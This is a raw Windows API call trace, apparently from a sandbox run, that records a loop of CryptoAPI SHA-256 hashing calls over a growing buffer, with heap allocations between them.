	[0193.934] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.934] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.935] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.935] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0193.935] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.935] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a7e8
	[0193.935] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a7e8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a7e8, pdwDataLen=0x1283b0) returned 1
	[0193.935] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.935] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.935] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.935] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.935] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0193.935] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.935] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a810
	[0193.935] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a810, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a810, pdwDataLen=0x1283b0) returned 1
	[0193.935] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.935] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.935] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.936] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.936] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0193.936] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.936] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a838
	[0193.936] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a838, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a838, pdwDataLen=0x1283b0) returned 1
	[0193.936] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.936] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.936] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.936] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.936] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0193.936] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.936] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a860
	[0193.936] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a860, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a860, pdwDataLen=0x1283b0) returned 1
	[0193.936] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.936] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.936] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.937] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.937] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0193.937] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.937] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a888
	[0193.937] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a888, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a888, pdwDataLen=0x1283b0) returned 1
	[0193.937] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.937] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.937] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.937] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.937] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0193.937] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.937] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a8b0
	[0193.937] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a8b0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a8b0, pdwDataLen=0x1283b0) returned 1
	[0193.938] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.938] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.938] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.938] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.938] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0193.938] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.938] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a8d8
	[0193.938] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a8d8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a8d8, pdwDataLen=0x1283b0) returned 1
	[0193.938] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.938] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.938] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.939] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.939] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0193.939] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.939] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a900
	[0193.939] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a900, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a900, pdwDataLen=0x1283b0) returned 1
	[0193.939] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.939] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.939] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.939] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.939] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0193.939] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.939] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a928
	[0193.939] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a928, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a928, pdwDataLen=0x1283b0) returned 1
	[0193.939] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.939] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.939] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.940] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.940] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0193.940] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.940] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a950
	[0193.940] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a950, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a950, pdwDataLen=0x1283b0) returned 1
	[0193.940] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.940] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.940] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.940] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.940] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0193.940] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.940] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a978
	[0193.940] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a978, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a978, pdwDataLen=0x1283b0) returned 1
	[0193.941] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.941] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.941] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.941] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.941] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0193.941] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.941] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a9a0
	[0193.941] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a9a0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a9a0, pdwDataLen=0x1283b0) returned 1
	[0193.941] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.941] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.941] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.941] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.941] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0193.941] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.941] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a9c8
	[0193.942] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230a9c8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a9c8, pdwDataLen=0x1283b0) returned 1
	[0193.942] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.942] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.942] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.942] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.942] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0193.942] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.942] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230a9f0
	[0193.942] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230a9f0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230a9f0, pdwDataLen=0x1283b0) returned 1
	[0193.942] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.942] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.942] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.942] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.942] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0193.942] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.942] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230aa18
	[0193.942] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230aa18, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230aa18, pdwDataLen=0x1283b0) returned 1
	[0193.943] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.943] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.943] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.943] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.943] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0193.943] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.943] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230aa40
	[0193.943] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230aa40, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230aa40, pdwDataLen=0x1283b0) returned 1
	[0193.943] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.943] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.943] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.943] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.943] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0193.943] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.943] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230aa68
	[0193.943] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230aa68, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230aa68, pdwDataLen=0x1283b0) returned 1
	[0193.944] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.944] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.944] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.944] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.944] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0193.944] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.944] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230aa90
	[0193.944] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230aa90, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230aa90, pdwDataLen=0x1283b0) returned 1
	[0193.944] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.944] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.944] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.945] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.945] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0193.945] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.945] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230aab8
	[0193.945] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230aab8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230aab8, pdwDataLen=0x1283b0) returned 1
	[0193.945] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.945] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.945] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.945] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.946] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0193.946] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.946] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230aae0
	[0193.946] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230aae0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230aae0, pdwDataLen=0x1283b0) returned 1
	[0193.946] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.946] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.946] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.946] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.946] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0193.946] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.946] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ab08
	[0193.946] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230ab08, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230ab08, pdwDataLen=0x1283b0) returned 1
	[0193.946] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.946] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.946] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.947] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.947] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0193.947] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.947] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ab30
	[0193.947] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230ab30, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230ab30, pdwDataLen=0x1283b0) returned 1
	[0193.947] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.947] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.947] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.947] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.947] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0193.947] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.947] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ab58
	[0193.947] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230ab58, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230ab58, pdwDataLen=0x1283b0) returned 1
	[0193.947] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.948] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.948] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.948] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.948] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0193.948] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.948] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ab80
	[0193.948] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x230ab80, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230ab80, pdwDataLen=0x1283b0) returned 1
	[0193.948] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.948] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.948] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.948] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.948] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0193.948] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.948] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230aba8
	[0193.948] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230aba8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x230aba8, pdwDataLen=0x1283b0) returned 1
	[0193.948] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.949] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.949] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
